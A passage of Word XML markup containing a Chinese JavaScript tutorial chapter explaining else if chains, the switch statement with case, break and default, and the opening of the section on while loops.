      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>之前的条件都为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则执行这里的代码块</w:t>
      </w:r>
      <w:r>
        <w:t>4</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这种代码并没有什么特别之处，它由多条</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句组成，每条</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句的</w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:t>从句又包含另外一条</w:t>
      </w:r>
      <w:r>
        <w:t>i f</w:t>
      </w:r>
      <w:r>
        <w:t>语句。可以用</w:t>
      </w:r>
      <w:r>
        <w:t>i f</w:t>
      </w:r>
      <w:r>
        <w:t>语句的嵌套形式来完成在语法上等价的代码，但与之相比，显然使用</w:t>
      </w:r>
      <w:r>
        <w:t>else if</w:t>
      </w:r>
      <w:r>
        <w:t>写法更清晰也更可取：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n==1){//</w:t>
      </w:r>
      <w:r>
        <w:t>执行代码块</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n==2){//</w:t>
      </w:r>
      <w:r>
        <w:t>执行代码块</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n==3){//</w:t>
      </w:r>
      <w:r>
        <w:t>执行代码块</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>如果所有的判断都是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，执行代码块</w:t>
      </w:r>
      <w:r>
        <w:t>4</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116" w:name="5_4_3_switch"/>
      <w:r>
        <w:t>5.4.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句在程序执行过程中创建一条分支，并且可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>else if</w:t>
      </w:r>
      <w:r>
        <w:t>来处理多条分支。然而，当所有的分支都依赖于同一个表达式的值时，</w:t>
      </w:r>
      <w:r>
        <w:t>else if</w:t>
      </w:r>
      <w:r>
        <w:t>并不是最佳解决方案。在这种情况下，重复计算多条</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句中的条件表达式是非常浪费的做法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句正适合处理这种情况。关键字</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>之后紧跟着圆括号括起来的一个表达式，随后是一对花括号括起来的代码块：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>switch(expression){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statements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然而，</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句的完整语法要比这复杂一些。代码块中可以使用多个由</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>关键字标识的代码片段，</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>之后是一个表达式和一个冒号，</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>和标记语句很类似，只是这个标记语句并没有名字，它只和它后面的表达式关联在一起。当执行这条</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句的时候，它首先计算</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>的值，然后查找</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>子句中的表达式是否和</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>的值相同（这里的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>相同</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是按照</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符进行比较的）。如果找到匹配的</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>，那么将会执行</w:t>
      </w:r>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>对应的代码块。如果找不到匹配的</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>，那么将会执行</w:t>
      </w:r>
      <w:r>
        <w:t>"default:"</w:t>
      </w:r>
      <w:r>
        <w:t>标签中的代码块。如果没有</w:t>
      </w:r>
      <w:r>
        <w:t>"default:"</w:t>
      </w:r>
      <w:r>
        <w:t>标签，</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句将跳过它的所有代码块。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句是非常容易引起混淆的。用例子来解释会比较清晰一些，下面的</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句和方才展示的</w:t>
      </w:r>
      <w:r>
        <w:t>if/else</w:t>
      </w:r>
      <w:r>
        <w:t>语句是等价的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>switch(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case 1://</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>n===1</w:t>
      </w:r>
      <w:r>
        <w:t>，从这里开始执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>执行代码块</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>break;//</w:t>
      </w:r>
      <w:r>
        <w:t>停止执行</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case 2://</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>n===2</w:t>
      </w:r>
      <w:r>
        <w:t>，从这里执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>执行代码块</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>;//</w:t>
      </w:r>
      <w:r>
        <w:t>在这里停止执行</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case 3://</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>n===3</w:t>
      </w:r>
      <w:r>
        <w:t>，从这里执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>执行代码块</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>break;//</w:t>
      </w:r>
      <w:r>
        <w:t>在这里停止执行</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>default://</w:t>
      </w:r>
      <w:r>
        <w:t>如果所有的条件都不匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>执行代码块</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>break;//</w:t>
      </w:r>
      <w:r>
        <w:t>在这里停止执行</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句</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需要注意的是，在上面的代码中，在每一个</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>语句块的结尾处都使用了关键字</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>。我们将在后面介绍</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句，</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句可以使解释器跳出</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句或循环语句。在</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句中，</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>只是指明了要执行的代码起点，但并没有指明终点。如果没有</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句，那么</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句就会从与</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>的值相匹配的</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>标签处的代码块开始执行，依次执行后续的语句，一直到整个</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>代码块的结尾。这种由一个</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>标签执行到下一个</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>标签的代码逻辑是很少使用的，在大多数情况下，应</w:t>
      </w:r>
      <w:r>
        <w:t>该使用</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句来终止每个</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>语句块。当然，如果在函数中使用</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句，可以使</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>都用于终止</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句，也会防止一个</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>语句块执行完后继续执行下一个</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>语句块。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句的例子更加贴近实战，它根据值的类型将该值转换为字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function convert(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>switch(typeof x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case'number'://</w:t>
      </w:r>
      <w:r>
        <w:t>将数字转换为十六进制数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return x.toString(16);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case'string'://</w:t>
      </w:r>
      <w:r>
        <w:t>返回两端带双引号的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return'"'+x+'"';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>default://</w:t>
      </w:r>
      <w:r>
        <w:t>使用普通的方法转换其他类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return String(x);</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注意，在上面两个例子中，</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>关键字后跟随的是数字和字符串直接量，在实际中这是</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句最常见的用法，但是</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准允许每个</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>关键字跟随任意的表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句首先计算</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>关键字后的表达式，然后按照从上到下的顺序计算每个</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>后的表达式，直到执行到</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>的表达式的值与</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>的表达式的值相等时为止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。由于对每个</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>的匹配操作实际上是</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>恒等运算符比较，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>相等运算符比较，因此，表达式和</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>的匹配并不会做任何类型转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>由于每次执行</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句的时候，并不是所有的</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>表达式都能执行到，因此，应当避免使用带有副作用的</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>表达式，比如函数调用表达式和赋值表达式。最安全的做法就是在</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>表达式中使用常量表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>前面提到过，如果</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>表达式与所有</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>表达式都不匹配，则执行标记为</w:t>
      </w:r>
      <w:r>
        <w:t>"default:"</w:t>
      </w:r>
      <w:r>
        <w:t>的语句块；如果没有</w:t>
      </w:r>
      <w:r>
        <w:t>"default:"</w:t>
      </w:r>
      <w:r>
        <w:t>标签，则</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>的整个语句块都将跳过。我们注意到，在之前的例子中，</w:t>
      </w:r>
      <w:r>
        <w:t>"default:"</w:t>
      </w:r>
      <w:r>
        <w:t>标签都出现在</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>的末尾，位于所有</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>标签之后。当然这是最合理也是最常用的写法，实际上，</w:t>
      </w:r>
      <w:r>
        <w:t>"default:"</w:t>
      </w:r>
      <w:r>
        <w:t>标签可以放置在</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句内的任何地方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="5_5_Xun_Huan_"/>
      <w:r>
        <w:t>5.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　循环</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了理解条件语句，可以将在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码想象成一条条的分支路径。循环语句（</w:t>
      </w:r>
      <w:r>
        <w:t>looping statement</w:t>
      </w:r>
      <w:r>
        <w:t>）就是程序路径的一个回路，可以让一部分代码重复执行。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>种循环语句：</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>do/while</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>。下面几节将会依次讲解它们。其中最常用的循环就是对数组元素的遍历，</w:t>
      </w:r>
      <w:r>
        <w:t>7.6</w:t>
      </w:r>
      <w:r>
        <w:t>节详细讨论这种循环和使用数组类定义的特殊循环方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="5_5_1_while"/>
      <w:r>
        <w:t>5.5.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句是一种基本的控制语句，用来选择执行程序的分支语句。和</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>语句也是一个基本循环语句，它的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(expression)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在执行</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>语句之前，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器首先计算</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>的值，如果它的值是假值，那么程序将跳过循环体中的逻辑</w:t>
      </w:r>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
      <w:r>
        <w:t>转而执行程序中</w:t>
      </w:r>
      <w:r>
        <w:t>的下一条语句。反之，如果表达式</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>是真值，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器将执行循环体内的逻辑，然后再次计算表达式</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>的值，这种循环会一直继续下去，直到</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
